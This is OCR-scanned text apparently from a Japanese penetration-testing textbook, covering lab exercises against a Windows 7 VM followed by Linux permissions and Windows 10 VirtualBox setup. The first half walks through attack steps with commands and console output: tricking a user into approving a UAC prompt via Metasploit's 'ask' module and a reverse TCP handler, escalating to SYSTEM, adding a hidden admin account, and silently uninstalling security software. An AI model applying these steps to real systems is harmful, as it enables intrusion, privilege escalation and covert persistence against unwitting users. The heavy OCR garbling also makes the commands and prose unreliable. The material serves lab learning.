UAC 機 能 を 回 避 サ ず に 、 ま ぎら わし い UAC 画 面 を 表示 きせ て ター ゲッ ト 上 端末 
の 操作 者 に プロ グラ ム の 実行 を 許可 きせ る と いう テク ニッ ク が あり ます 。 


1①)UAC 画 面 を 表示 させ る 
IEUser 権 限 の セッ ショ ン が 確立 済み と し ます 。 


msf† exploit(multi/handler) > sessions -1i 


Active SeSSionS 


Td Name Type Information Connection 


4 meterpreter x86/windows IE8MIN7\IEUser 0 IE8MIN7 .」 
19.9.9.2:4444 -> 19.9.9.192:49238 (19.9.9.192) 
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Metasploit に 用 意 さ きれ て いる ask モ ジュ ー ル ("exploit/windows/local/ask") を 
使い ます 。 
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Exploit target†: 


Td Name 


9 Mindows 


ms 千 explo1t(w1ndows/ 1oca1/ask ) > exploi ト 


*] Started reverse TCP handler on 19.9.9.2:4444 
UAC is Enabled, checking level... 


具 
叶 
[|*] The user wil1 be prompted, wait †or them to click "Ok' 
1 
呈 


*] Uploading lcVdhg.exe - 73892 bytes to the filesystem. . . 
Executing Command! 一 oo に 4. プロ グラ ム を 送り 込む 。 


で uAC 画 面 が 表示 され る 。 





2②UAC 画 面 の 動作 を 確認 する 

Windows 側 に UAC 画 面 が 表示 され ます 。 操作 者 が [Yes] ボタ ン を 押す と 、 
瞬 だ け コ マン ド プ ロン プ ト (ある い は PowerShell) の 画面 が 表示 され 、 自 動 的 に 
閉じ ます 。Kali 側 を 確認 する と 、 Meterpreter プロ ンプ ト の セッ ショ ン が 確立 し て 
いま す 。 

この アプ ロー チ は 、 タ ー ゲ ッ ト 端 末 の 画面 に て 目立つ 動き が あり 、 操 作者 に よ 
る アク ショ ン に 依存 する た め 、 あ まり エレ ガン ト な 攻撃 と は いえ ませ ん 。 登 戒 心 
の 強い 操作 者 は LNo] ボタ ン を 押す か も し れ ま せん 。 ま た 、 離 席 中 の 間 、Kali 側 
で は ずっ と 待つ こと に な り ま す 。 


3③)Kali 側 の セッ ショ ン を 確認 する 
Kali 側 の セッ ショ ン を 確認 し ます 。 


[*] Executing Command! 
[*] Sending stage (179779 bytes ) to 19.9.9.192 操作 者 が [Yes ] ボタ ン を 押し た 。 
[*] Meterpreter session 5 opened (19.9.9.2:4444 -> 19.9.9.192:49241) 
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at 2918-97-27 22:41: の 7 +9999 


meterpreter > getuid 

SerVver uSsername: IE8MIN7\TEUser この 時 点 で は まだ SYSTEM 権 限 で は な い 。 
meterpreter > getsystem 明示 的 に SYSTEM 権 限 に な る こと を 指示 する 。 
...gOt system via technique 1 (Named Pipe Impersonation (In Memory/-] 
Admin ) ) . 

meterpreter > getuid 

Server username: NT AUTHORITY\SYSTEM 








な お 、 こ の アプ ロー チ は Windows 10 で は うま くい きま せん 。 


人 で ター ゲッ ト 英 末 に ユー ザー を 追加 する 
SYSTEM 権限 が あれ ば 、 ユ ー ザ ー を 追加 ・ 編 集 ・ 削 除 で きま す 。 


1SYSTEM 権限 で ある こと を 確認 する 
SYSTEM 権限 で ある こと を 確認 し ます 。 


meterDreter > getuid 
SePVer uSername: NT AUITHORTTY\SYSTENM 


2 シェ ル を 呼び 出す 
shell コ マン ド で シェ ル (Windows で は "cmd.exe") を 呼び 出し ます 。 


meterpreter > shel1 

Process 3349 created . 

Channel 1 created. 

Microsof†t Mindows [Version 6.1.7691] 

Copyr1ght (c) 2999 Microso†t Corporatnon. Al rights reserved . 


C:\M1indows\system32> 
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⑬ ユ ー ザ ー (アカ ウン ト ) を 表示 する 
ここ まで くれ ば 、 コ マン ド プ ロン プ ト で ユー ザー を 列挙 ・ 登 録 ・ 削 除 が 可能 で 
す 。 ユー ザー を 列挙 する に は 、 引 数 な し で net user コマ ンド を 実行 し ます ("20)。 





Administrator、Guest、IEUser、sshd、sshd_server の 5 つの アカ ウン ト が 存在 
し て いま す 。 一 方 、 Windows 7 に お いて 、「Control Panel」 > 「User Accounts and 
Family Safety」 > 「User Accounts] > 「Manage Accounts] を 表示 する と 、3 つ 
の アカ ウン ト が 表示 され ます ( 図 4.25)。 Administrator と sshd ユ ー ザ ー が 表示 さ 
れ て いな い の は 、 ア カウ ント が 無効 に な っ て いる た めで す 。 














図 4.25 GUI で ユー ザー アカ ウン ト を 表示 する 


*20 : ドメイン の ユー ザー を 列挙 する に は 、net user /domain コマ ンド を 用 いま す 。 
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net user コ マン ド に ユー ザー 名 を 指定 する と 、 そ の アカ ウン ト の 詳細 が 表示 さ 
れ ま す 。「Account active」 が No で あれ ば GUI で 表示 され ず 、 Yes で あれ ば 表示 さ 
れ ま す 。 





(4④. ユー ザー を 追加 し て 管理 者 権限 を 与え る 
次 の よう に 入力 する と 、test と いう ユー ザー が 追加 され ます 。 





278 | 第 2 部 | ハッ キン グ を 体験 する 


Windows 7 の 「Manage Accounts」 画面 で も 確認 で きま す 。 
test ユ ー ザ ー の パス ワー ド を 変更 する に は 、 次 の よう に し ます 。 





C:\Mindows\system32>net user test 1234 パス ワー ド を "1234 "に する 。 
net user tes† 1234 
The command completed successful1y. 


さら に 、test ユ ー ザ ー を 管理 者 グル ー プ に 入れ て 、 管 理 者 権限 を 与え ます ( 図 
4-26) 。 


C:\M1ndows\system32>net localgroup adm1in1istrators test /add 
net localgroup adm1n1strators test /add 
The command completed successful1y . 


ーー 一 pe 回 
IEUser sshd server aCcount 
「 Administrator Administrator 
Password protected Password protected 


Guest 
Guest account is off 


パス ワー ド で 保護 され て いま す 。 





図 4.26 test ユ ー ザ ー に 管理 者 権限 を 与え た 
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(5 ユー ザー を 削除 する 
ユー ザー を 削除 する に は 、 次 の よう に し ます 。 


test ユ ー ザ ー が 消え た 





@ ター ゲッ ト 端 末 の アプ リ を アン イン スト ー ル する 

例え ば 、 ハ ッ キ ング に お いて は セキ ュ リ ティ ソフ ト な ど を アン イン スト ー ル し 
た い 状 況 が あり ます 。 そ うい っ た 場合 は 、 次 の 手順 で ター ゲッ ト か ら ア プリ を ア 
ン イ ンス トー ル で きま す 。 た だ し 、 ア ン イ ンス トー ラー が 用 意 き れ た タイ プ の ア 
プリ だ けが 対象 と な り ま す 。 


①SYSTEM 権限 で ある こと を 確認 する 
SYSTEM 権限 で ある こと を 確認 し ます 。 
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(② イ ンス トー ル 済 み の ア プリ を 表示 する こそ の 1 > 
アプ リ 列 挙 モ ジュ ー ル (post/windows/gather/enum_application ) を 用 いる 
と 、 タ ー ゲ ッ ト 端 末 に イン スト ー ル 済み の アプ リ を 列挙 で きま す ("21)。 





*21 : この 出力 結果 か ら Guest Addiions が イン スト ー ル 済み だ と わか る の で 、 タ ー ゲ ッ ト が 
VirtnalBox の 仮想 マシ ン で ある と 推測 で きま す 。 た だ し 、 仮想 マシ ン で あっ て も Guest Additions 
が 常に イン スト ー ル され て いる と は 限り ませ ん 。 
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Windows 7 の スタ ー ト メニ ュー の 「Control Panell > 「Programs」 > 「Uninstall 
a program」 で アン イン スト ー ル 画面 を 表示 し ます ( 図 427)。 こ こ で 、 イ ンス トー 
ル 済 み の ア プリ を 確認 で きま す 。 


Bi Uninstall or chanqe a procjrarm 
Te uminsta proorarm seiect tt from the lt sand then dick Uningall Chsange. cr Repair。 


OpenSSH fo Windows る 7p4 -2 (removs only) 
回 Giacie yM VidaalBox Gaet &34ibom 5.3.12 





図 4.27 アン イン スト ー ル 画面 
アプ リ の 項目 数 に は 人 違 い が あ り ま す が 、 内 容 に 関し て は 一 致し て いま す 。 


⑬③ イ ンス トー ル 済 み の ア プリ を 表示 する くそ の 2> 

コマ ンド プロ ンプ ト で wmic product get name コマ ンド を 入力 し て も アプ リ を 
列挙 で きま す 。 ま た 、「wmic product get name, installLocationl コマ ンド を 用 い 
る と 、 イ ンス トー ル パ ス も 表示 され ます 。 
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ステ ッ プ ② の 内 容 と 若干 異な り 、 表 示さ れ て いな い ア プリ が あり ます 。 ま た 、 イ 
ンス トー ル パ ス が 表示 され な い ア プリ も 存在 し ます 。 


④ ア プリ を アン イン スト ー ル する 
アン イン スト ー ル し た い ア プリ が あれ ば 、 次 の よう に 入力 し ます 。 サ イレ ント 
モー ド で 処理 が 実行 きれ る の で 、 タ ー ゲ ッ ト 端 末 の 操作 者 に 気付 か れ ま せん 。 





人 で ター ゲッ ト 滑 末 が 仮想 マシ ン で ある か を 調べ る 


① タ ー ゲ ッ ト 上 端末 が 仮想 マシ ン か と うか を 確認 する くそ の 1 > 
仮想 マシ ン の チェ ッ ク モ ジュ ー ル ("post/windows/gather/checkvm") を 利用 し 
て 、 タ ー ゲ ッ ト 端 末 が 仮想 マシ ン か どう か を 判定 で きま す 。 
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② タ ー ゲ ッ ト 上 端末 が 仮想 マシ ン か どう か を 確認 する くそ の 2> 

コマ ンド プロ ンプ ト 上 で systeminfo コ マン ド を 実行 する と 、 シ ステ ム の 詳細 情 
報 が 得 ら れ ま す 。「System Manufacture」「System Modell の 項目 に 注目 する と 、 
仮想 マシ ン と わか る こと が あり ます 。 
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Linux の パー ミッ ショ ン 


Linux で は 、 フ ァイル や ディ レク トリ の アク セス 権 が 設定 され て いま す 。 こ の ア 
クセ ス 権 の こと を パー ミッ ショ ン と いい ます 。 

ls コマ ンド に | オプ ショ ン を 付け る と 、 第 1 フィ ー ル ド に パー ミッ ショ ン が 表示 
され ます 。 ま た 、 第 3 フィ ー ル ド に 所 有 ユ ー ザ ー、 第 4 フィ ー ル ド に 所 有 グ ルー プ 
が 表示 され ます 。 


Poot 條 kal1:<# 1s -1 factor.py 
-PwXP-XFP-X 1 root root 582 May 27 92:43 factor .py 


パー ミッ ショ ン の 表示 形式 は 表 4.4 の よう に な り ま す 。 


表 4.4 パー ミッ ショ ン の 表示 形式 


[-|」 は ファ イル 、[d|] は ディ レク トリ 、 [中 は シン ボリ ッ ク リ ン 
グ 、 [sj は ソ ケ ッ ト 。 


所 有 ユ ー ザ ー (オー ナー) に 対す る 権限 。 
所 有 グ ルー プ に 玖 する 析 


_ 人 ザー に も 所 有 グ ルー プ に も 属し な い ユ ー ザ ー に 対す 


この よう に 権限 は 3 つ あ り 、 そ れ ぞ れ は 表 4.5 の 4 つの 文字 で 表現 され ます 。 





表 4-5 権限 を 示す 文字 


TWOWIWIWIKWIm ね や ts⑱b( 了 ぼや Io1o1o1l 
- | 権限 が 許可 され て いな い 。 


「 | 読み 取り 可能 >。go 5 5 2)!t〔usx〔{o〔※5V※ 
IM | 書 き 入 可能 < so 5 6 や 6《6《6《6《q《 和 Q ゾ ぜ d 


IX | ファ イル の 場合 は 実行 可能 。 デ ィ レ クト リ の 場合 は 移動 可能 。 





上 記 の 例 で は パー ミッ ショ ン が |-rwxr-xrx] と な っ て いま し た 。 これ は 次 の よ 
うな 意味 に な り ま す 。 
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* 肖 象 は ファ イル 〔(-) 

* 所 有 ユ ー ザ ーroot は 、 フ ァイル の 読み 込み (r)・ 書 き 込 み (w)・ 実 行 (x) が 可 
能 

* 所 有 グ ルー プ root は 、 フ ァイル の 読み 込み (r)・ 実 行 (x) が 可能 

・ それ 以外 の ユー ザー は 、 フ ァイル の 読み 込み (て)・ 実 行 (x) が 可能 


パー ミッ ショ ン は 数 値 で も 表現 で きま す 。「-」 を オフ 、|「r」 「w」 |「x] を オン と 
解釈 し ます 。 そ し て 、 オ フ を 0、 オ ン を 1 に 対応 させ ます 。 

例え ば 「rwx」 は 読み 取り オン 、 書 き 込 み オ ン 、 実 行 オ ン で あり 、2 進 数 で 111 
と 表記 で きま す 。 こ れ は 8 進数 に 直す と 7 に な り ま す 。 同様 に 考え る と 、「r-x」 は 
2 進数 で 101 で あり 、8 進 数 で 5 に な り ま す 。3 つ の 権限 の 数 値 を 並べ て 、|「 rwxr- 
xr-x」 は パー ミッ ショ ン が 755 の ファ イル と 表現 で きま す 。 パ ー ミ ッ シ ョ ン を 数 値 
で 表現 する こと で 、 簡 潔 に 書け 、 ミ ス も 少な く な り ま す 。 


パー ミッ ショ ン 関 連 の コマ ンド 
パー ミッ ショ ン 関 連 の コマ ンド は 表 4.6 の 通 り です 。 


表 446 パー ミッ ショ ン 関 連 の コマ ンド 一 覧 


szF [mm 










ステ ィ ッ ギー ビッ ト 

ディ レク トリ の 書き 込み 権限 を 持っ て いる 場合 、 そ の ディ レク トリ 内 の ファ イ 
ル や ディ レク トリ に 対し て 、 和 目 分 が 所 有 者 で な か っ た り 、 そ の ファ イル の 読み 取 
り ・ 書 き 込 み 権限 が な か っ た り し て も 削除 で き て し まい ます 。 

こう し た 仕様 で は 問題 が 生じ る 場合 が ある た め 、 ス ティ ッ キ ー ビ ッ ト と いう 概 
念 が 用 意 き され て いま す 。 ス ティ ッ キ ー ビ ッ ト を 設定 する と 、 デ ィ レ クト リ 内 の 自 
分 が 所 有する ファ イル だ け を 削除 で きる よう に な り ま す 。 こ れ を 実現 する に は 、 
次 の よう に chmod コマ ンド に +t オ プシ ョ ン を 付け ます 。 
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Poot 介 ka11 :># Chmod + モ 上 test/ 
Foot 人 kal1:<# 1s -1d test/ 
drwxP-Xr-† 2 root root 4996 Jul 4 13:22 test†/ 


ステ ィ ッ キー ビッ ト が 設定 され て いる と 、 そ れ 以 外 の ユー ザー の 実行 パー ミッ 
ショ ン の 人 箇所 が 「x| で は な く 、「t」 と な り ま す 。 

例え ば 、 ユ ー ザ ー 全 員 が 一 時 的 な 格納 場所 と し て 使う /tmp ディ レク トリ は 、 
ステ ィ ッ キー ビッ ト が 設定 され て いま す 。 ユ ー ザ ー は 誰 で も この ディ レク トリ 内 
に ファ イル や ディ レク トリ を 作成 で きま す が 、 自 分 が 所 有する ファ イル と ディ レ 
クト リ し か 削除 で きま せん 。 


Poot 人 kal1:<# 1s -1d /tmp 
drwxrwxPwt 16 root root 4996 Jul 4 97:97 /tmp 
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4-2 | late【o/ た 名 上 0I ク 7A ジ た コン アル 





Windows 10 は 、Windows 7 より セキ ュ リ ティ が 強化 きれ て いま す 。 そ の た め 、 
ハッ キン グ の 基本 的 な 流れ は あま り 変 わり ませ ん が 、 具 体 的 な 攻撃 手法 は 若干 異 
で は 、Windows 10 の 仮想 マシ ン を 構築 し 、Metasploit を 用 いた 


誠 iso ファ イル か が か ら の 仮想 マシ ン 構 築 の 流れ 

これ まで は 、ova フ ァイル を イン ポー ト し て 仮想 マシ ン を 構築 し まし た 。 こ こ で 
は 、iso フ ァイル か ら プ ブー ト し て Windows 10 を イン スト ー ル し ます 。 これ は 、 物 
理 マ シン に イン スト ー ル DVD を 挿入 し て 、OS を イン スト ー ル する 方 法 に 相当 し 
ます 。 

ova ファ イル が 必ず 提供 され て いる と は 限ら な いた だ た め 、jiso フ ァイル で 仮想 マシ 
ン に OS を イン スト ー ル する と いう 方 法 は より 汎用 的 と いえ ます 。 

仮想 マシ ン の 構築 の 流れ は 、 次 の よう に な り ま す 。 


1. 新規 に 仮想 マン ン を 作る 
この 段 階 で は 、 仮 想 の ハー ドウ ェ ア 環 境 や 領域 を 決め た だ け で あり 、OS は イン 
スト ー ル され て いな い 状 態 で す 。 つ まり 、 空 っ ぽ の 箱 の よう な 状況 と いえ ます 。 


2.ISO フ ァイル を フー ト し て 、 仮想 マシ ン に OS を イン スト ー ル する 

イィ ンス トー ルウ ィ ザ ー ド に し た が っ て 仮想 マシ ン に OS を イン スト ー ル し ます 
イィ ンス トー ル が 完了 する と 、 人 仮想 マシ ン が 完成 し た こと に な り ま す 。 箱 の 中 に OS 
が 詰め 込ま れ た よう な 状況 と いえ ます 。 


湖 Windows 10 の iso ファ イル を 準備 する 


Windows 10 の iso フ ァイル を タダ ウン ロー ド す る 
Microsoft の Web サ イト か ら Windows 10 の iso ファ イル を ダウ ン ロ ー ド し ます 
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C22) 。 





Windows10 の ダウ ン ロ ー ド 


https:// www.microsoft.com/ja- jP/ software-download/windows10ISO 





アク セス し た マシ ン の OS が Windows 10 メ ディ ア 作 成 ツ ソー ル を サポ ボー ト し て い 
る 場合 に は 、 メ ディ ア 作 成 ツ ー ル の ダウ ン ロ ー ド 画面 が 表示 され ます ( 図 4-28)。 


ソリ フト ウェ ア の ヅ ウ リン 


Tle【 の に 剖 0 胡 の らん アア 四 に に に 


PC へ の Windows 10 の イン スト ー ル を ご 希望 で すか 3? 


障 婦 する に は 、Windovrs 10 を イン スト ー ル する た め の ラ イ ゼ ン ス が 必 革 で す 。 そ の 後 、 メ ディ ア 作 成 ツー 
ルル を ダウ ン ロ ー ド し て 行 する ご と が で きま す . ツー ル の 合い 方 に つい て の 旦 組 は 、 下 の 悦 需 和 キ ご 重く だ さ 


ちら と ュ ミミ エー デビ ピノ = に コ に 


プラ イル バッ ー 


さ ) この ツー ル を 低 用 し て 、 こ の PC を Windows 30 に アッ プ グ レー ド す る (クリ ッ ク し て 、 痢 緒 情 震 の 表示 と 非 表示 を 切り 替え ます ) 


③ この ツー ル を 信用 し て 、 功 の PC に WinGow* 30 を イン スト ー ル する た め に イン スト ー ル メデ ィ ア (USB フラ ッシュ ドラ イブ プ 、DVD、 ま た は 』SO ファ イ 
ル ) を 作成 する (グリッ ク し て 、 洋 紐 情報 の 表示 と 非 表 坪 を 切り 替え ます ) 


(① その 他 の ダウ ン ロ ー ド オプ ショ ン 





図 4.28 メデ ィ ア 作成 ツー ル の ダウ ン ロ ー ド 画面 


Ao 
( MediaCreationToolexe ) が ダウ ン ロ ー ド され ます 。 こ の ボタ ン の 下部 に 、 ツ ー 
ル の 使用 方 法 が 解説 きれ て いる の で 、 実 行 前 に 確認 し て くだ さい 。 

今回 は Windows 10 の イン スト ー ル 用 の iso フ ァイル を 入手 する こと が 目的 で あ 
る た め 、| この ツー ル を 使用 し て 、 別 の PC に Windows 10 を イン スト ー ル する た め 
に オン スト ー ル メデ ィ イア (US5B フ アラ ッシュ ドラ イプ 。 DVD、 ま な は 5 〇 ひ テ アァ オル ) 
を 作成 する ] > 「ISO フ ァイル を 使用 し て Windows 10 を イン スト ー ル する た め の 
追加 の 方 法 」 が 当 し ます 。 


22 : Windows 10 Enterprise の 試用 版 は 、 次 の URL か ら ダ ウン ロー ド で きま す (評価 期限 は 90 日 
間 、 延 長 可能 )。 


https//www.microsoftcom/]a-jD/evalcenter/evaluate-windows-10-enterprise 
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な お 、 ア クセ ス し た マシ ン の OS が Windows 10 メ ディ ア 作 成 ツ ソー ル を サポ ー ト 
し て いな い 場 合 に は 、iso フ ァイル の ダウ ン ロ ー ド 画面 に な り ま す 。 例え ば 、 
macOS な ど で ア クセ ス し た 場合 な ど で す 。 日 本 語 か つ フ ルセット な の は 
| Windows 10 Creators Update」 の | Windows 10] な の で 、 エ ディ ショ ン は これ 
を 指定 し ます 


2 メデ ィ ア 作成 ツー ル を 実行 する 
"MediaCreationToolexe ファ イル を マー 者 権限 で 実行 し ます 。 | 


「 適用 きれ る 通知 と ライ セン ス 条 項 | 画面 が 表示 され ます 。「 司 
ン を 押し ます ( 図 4.29)。, 


る Wrapws 10 ゼット ア ッ ゴ 


適用 され る 通知 と ライ セン ス 条 項 


| ャ 


MICLROSOFI MIEDIA CREATION TOOL 


む お客様 の 大 住地 (全社 の 場合 は 主たる 業 吉 地 ) が 半田 内 で ある 場合 、 以下 の ! 哲平 力 の ある 全 狂 と 
梨 団 上 記 の 福利 計 札 』 の 円 定 を : ま 和 深く お 旗 み くだ た さい 。 招 調 第 考 は 、 証 計 を 前 流す る 方 法 に 罰 時 を 


TK な ユノ セ 
M 下 「 マ イコ 
ギン pF アア 」 こ リル ス ま 財 は っ 

(の * + た ロ 条 プロ グラ ト に 御 し し い 率 貞 ま 計 | 

5 素 に 隔 わ っ て 運用 され 、 更 拓本 の リフ ト つ フェ アミ ま だ は 
" 5 直 語っ れ ま : ゼ , お 吉富 が キテ f1 メメ 旬 項 を 時 定 す る に こ 4。 
ォ | >' す 用 マ 4 ディ スト る 証 I 


し て か > 


く 向 遇 に 人 党 さ れ た で の) 





「 
「 
colon 


図 4.29 | 適用 され る 通知 と ライ セン ス 条 項 」 画面 


3 実行 する 操作 を 選択 する 
実行 する 操作 を 選ぶ 画面 が 表示 され ます 。 | 別 の PC の イン スト 
作成 する 」 を 選択 し て 、[ 次 へ 」 ボタ ン を 押し ます ( 図 4-30) 


ー ル メデ ィ ア を 
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の オプ ブ プン: 


記 Wrdows 10 ぜ で を ト ア ッ プ 


| 実行 する 操作 を 選ん で くだ さい 





図 4-30 実行 する 操作 を 選ぶ 画面 


ー キ テク チャ を 指定 する 


ト - べ 『 


キテ クチ ャ 、 
四 ン を 使う 」 
ン の CPU の ビッ ト 数 に 合わ せ て アー キテ クチ ャ は | 
ト (x64) 」 の いずれ か が 人 れ て いま す 
ここ で は 、 両 方 に 対応 し た iso フ ・ 


イル を 用 意 | 
ョ ン を 使う 」 の チ 
選択 が 完了 


し 、 ア ー キ テク チャ に 
ら 、 | 次 へ 」 ボタ ン を 押 | 


記 Wrdows 0 せ セットアップ | 


| 言語 、 ア ー キ テク チャ 、 エ ディ ショ ン の 選択 


- デ イィ ショ ン の 選択 」 画面 
この PC に お すす め の オ プン 


が 表示 され ます 


テ チェ ニュ ュ ア ロー で 
妥 / "2 し 日 / ) 人 w 


( 図 4-31) 


ま aa 


この PC に お すす め 
| 両方 」 を 指 


EE しま 





図 4-31 アー 


キテ クチ ャ に | 両方 』 を 指定 


| 第 2 部 


| ハッ キン グ を 体験 する 





の メデ ィ ア に 書き 込め な い の で 注意 し て く 


ナ すゞ やく 
2 し * ュ コ 


ァイル に な り 、4.7G バ イト 


言 古 画面 で 承認 する 


プロ ダク トキ ー が 必要 に な る と いう 合 告 画面 が 表示 され ます 。 仮想 化す る に あ 
た っ て 、 プ ロダ クト キー が 必要 な こと 


と を 承知 し て いる の で 、IOK| ボタ ン を 押し 
ます 【( 図 本 32) 


ト 

イィ インストール メデ ィ ア で 須 ん だ エディ ショ ン が 6 PC に イン 
ル さ れ て いる Wmndows の エディ ショ ン と 一 致し て 

確か の め て くだ さい 。 一 穫 し て いな い 靖 含 、Window 

に は プロ ダク トト キー が ザ 必 に な り ま す - 


と ず と を 
s の イ ンス トー」 し 





図 4-32 芝 告 画面 


6 使用 する メデ ィ ア を 選択 する 


使用 する メデ ィ ア の 選択 画面 が 表示 され ます . 


「ISO フ ァイル 」 を 選択 し て 、 [ 
へ | ボタ ン を 押し ます ( 図 433) 


\ 片 っ 
し し 八 


記 Wrdown 10 せ セト アッ ズ 


使用 する メデ ィ ア を 選ん で くだ さい 





図 4.33 使用 する メデ ィ ア の 選択 


画面 
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7 保存 場所 を 指定 し て タダ ウン ロー ド を 完了 させ る 
保存 場所 を 指定 する 画面 が 表示 され ます 。 フ ァイル 名 が Windowsjiso に な っ 
て いま す が 、 わ か りや すい よう に Windows10jiso に 変更 し ます ( 図 4.34) 。iso 
レ 


ファ イル の 保存 場所 は どこ で も 構い ませ ん が 、 一 元 管理 し て お く こ と を お すす め 


ゆう 2cbun-83.0- 

《 う hbkino_lw-1.0.」4o 

人 もう hrtu-19- 14.0- つ omktop-( 全 
《 う Ain7_Pmo_SP1_ Eich_x3J.co 


吉 。 Wowi7.06 (て ] 


cs ボリ ユー ム [D 


| LTmWO_Recnvwry (: 
MMD DS201L Oz 39、1 ュ 
ま [39J.16B_3 355] 


ファ イル の 本 短 [『]: | I5O File ("。o) 





4-34 保存 場所 を 指定 する 画面 


保存 場所 を 指定 する と 、 ダ ウン ロー ド が 開始 され ます ( 図 4.35) 


ーー 


is Wirdows 10 ぜ ァ ト ア 9: 





図 4.35 ダウ ン ロ ー ド 画面 


ダウ ン ロ ー ド が 完了 する と 「ISO フ ァイル を DVD に コピ ー し て くだ さい 」 と い 
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表示 され ます 。[ 完了] ボタ ン を 押し て 、 画面 を 閉じ ます 


ます ( 図 


ISO ファ イル を DVD に コビー し て くだ さい 





図 4.36 Windows 10 セ ッ ト ア ッ プ 画面 を 閉じ る 


沙 新規 の 仮想 マシ ン を 構築 する 
OS を イン スズ 


トト ー ル する 空 の 仮想 マシ ン を 用 意 し ます 


仮想 マン ン を 新規 作成 する 


VirtualBox を 起動 し て 、 


メイ ン 画 面 の メニ ュー の 「 仮 # 
札 び ます . 


2 ジン | | 新 冊 」 を 


2 名 前 と OS を 設定 する 


仮想 マ の 3 作 威 」 画面 が 表 才 さ れ ま す | 名 前 どー マ く レー ティ ング シス チム 」 
の 設定 画面 で は 、 次 の よう に 指定 し て 、 [次 へ ] ボタ ン を 押し ま 


す ( 図 4.37) (*23)。 
* 名前: Windows 10 (64bit ja) 
s タ イプ : Microsoft Windows 
s バー ジョ ン : Windows 10 (64-bit) 
"23 : ここ で は ガイ ド 付 き モ ー ド で 説明 し ます 。 慣れ た ら エ キス パー トモ ー ド で 設定 し て も よい で 
| 区 の 
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《 白 起 マッ ン の 八大 
名 前 に オペ レー ティ ンジ シス テム 


い 優 旭 マ シン の 記 和 全 を 指定 し 、 イ ン ュ トー 有 ル する す ペ レー ティ ン ザ ジス チム の タイ プ を 選 
介し イン トー ルカ レブ イン 02 けい 6 了 
名 親 介 [WMndywe 10 649.jal 





バー ジョ ン (VI Was Tn 54-biD 中 一 





| ォ yo | 


図 4.37 「 名 前 た オペ レー ティ ング シス テム 」 の 設定 


3③ メ モリ ー サ イズ を 設定 する 

| メモ リー サイ ズ 」 の 設定 画面 に な り ま す 。Windows 10 は 起動 し て いる 状 台 で 
1G バイ ト 以 上 の メモ リー を 消費 する の で 、 最 低 で も 2G バ イト は 必要 と いえ ます 。 

Windows 10 の 32 ビ ッ ト 版 で あれ ば ぱ ば 、OS の 制限 に より 4G バ イト まで し か 認 
され ませ ん 。 つ まり 、 メ モリ ー サ イズ の 設定 で 4G バ イト 以上 を 割り 当て て も 意味 
が あり ませ ん 。 一 方 、64 ビ ッ ト 版 で あれ ば 、 メ モリ ー サ イズ の 制限 は な い の で 、 メ 
イン マシ ン (ホス ト 側 ) の メモ リー を 圧迫 し な い 程 度 に 設定 し ます 。 

バー の 矢印 を 調整 し た り 、 数 値 を 入力 し た りす る こと で メモ リー サイ ズ を 変更 
で きま す 。 な る べく 緑色 の 範囲 内 に 収まる よう に し ます ( 図 4-38)。 実験 中 に は ホ 
スト OS と し て Windows 10、 ゲ スト OS と し て Windows 10 と Kali を 同時 に 起動 し 
ます 。 物理 メモ リー サイ ズ と 消費 メモ リー サイ ズ を 考慮 し て 、 ゲ スト OS の 
Windows 10 の メモ リー サイ ズ を 決定 し て くだ さい 。 ここ で は 、2G バ イト を 指定 し 
ます が 、 余 裕 が あれ ば 4G バ イト に し た 方 が よい で し ょ う 。 
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を 誠 失 マ シ ツ の 作 威 


メモ リー サイ ズ 
この 倒 息 マウ ン (に 守 交 当て る モリ ー(RaMD の 容量 を パイ ト 単 記 で 選択 て くだ さい 。 
必 宝 な 4 モリ ー サ イズ は 200 ま SMB で す 。 


mryroprsmnermmrseerrersrsrermzamees sl vB 


B132 NMB 





図 4.38 「 メ モリ ー サ イズ 」| の 設定 


④ ハ ー ド ディ スク の 設定 を する 
[ハー ド デ ィ スク 」 の 設定 画面 に な り ま す 。 こ こ で は 、 | 仮想 ハー ド デ ィ スク を 


作成 する 」 を 選択 し ます ( 図 4.39)。 


を 宏 析 マ シン の 作成 
ハー ド テ ディ ス り 
皆目 (で ジン に 臣下 バー ド ギ ィ スカ 千 定 四 当 て る こと が で きま す 。 そ 身 電 合 は 新しい ハー ド ギ ィ スカ 
な ば ず t5A99 か 、 リス ト が か ら ) た は フォルテ ー ア アイゴ を 使用 し て ほ 直 の 電 所 后 ら 指 定 で 


潜 な スト レー ジ の 旋 定 を ける 夫人 は 、 テッ プ を 2 キッ プ し て マシ ン を 一 度 作 友 し て か ら マ ッ 


心 天 な ハー ド テ ディ ス 2 の サイ ズ I は 50.90 GB で す 。 

( 孤 垢 ハー ド デ ィ メ 2 を 追 用 し な ((D) 

@) 仮 感 トード ディ スク を ( 作 応 る (O! 

O 9 て (C の る 公夫 パード ディ のみ イル を 合用 ずるい 





図 4.39 「 ハ ー ド ディ スク ] の 設定 
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5) ハー ド デ ィ スク の ファ イル タイ プ を 設定 する 
[ハー ド デ ィ スク の ファ イル タイ プ ] の 設定 画面 に な り ま す 。 表 4.7 の 3 種類 か ら 
選べ ます (*24)。 こ こ で は 、 デ フォ ルト の VDI を 選ん だ まま 進み ます ( 図 4-40)。 


ララ ーー ーー 選択 で きる ファ イル タイ プ 


ファ イル タイ プ | 意味 
の (Open Virtualization Format) 規約 


VDI (VirtualBox Disk Image) に 沿っ た 仮想 ディ スク 形式 。 


VHD (Virtual Hard Disk) Microsoft の Hyper-V な どの ファ イル 形式 。 
VMDK (Virtual Machine Disk) (*25) | VMware の ファ イル 形式 。 


と 宏 想 八 - ド ディ スグ の 作成 
ハー ド デ ィ スリ の アイ ルイ ゴ 


329 AP PT 


0 に い CK 
| hi 6 hisk [maeei 
( 〇 つ VHD(Vrtual Hsrg Dskj 
(〕 VHHK (Vireol Nschre Diski 









エキ スリ イー トモ ー ド (B 


図 4.440 「 ハ ー ド ディ スク の ファ イル タイ プ ] の 設定 


24 : エキ スパ ー ト モー ド で は 、 加 えて 次 の 3 種類 も 選択 で きま す 。 

・HDD (Parallels Hard Disk) 

・QCOW (QEMU Copy-On-Wiite) 

・QED (QEMU Enhanced Disk) 

QEMU と は 、 マ シン エミ ュ レ ー タ ー で す 。 x86、 PowerPC、 ARM、 MIPS な どの 多く の CPU 環境 
と LO デバ イス を エミ ュ レ ーション で きま す 。 


25 : vmdk フ ァイル は 一 般 の 仮想 ディ スク イメ ー ジ ファ イル で あり 、 実 際 の スト レー ジ デ バイ ス 
の よう に 見 えま す 。Linux 上 で あれ ば 、 次 の よう に fdisk コマ ンド で 読み 込む と 、 普通 に パー ティ 
ン ヨ ン が 表示 され ます 。 


# fdisk <vmdk フ ァイル > 
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(⑥ 物 理 ハ ー ド ディ スク に ある スト レー ジ の 種類 を 設定 する 

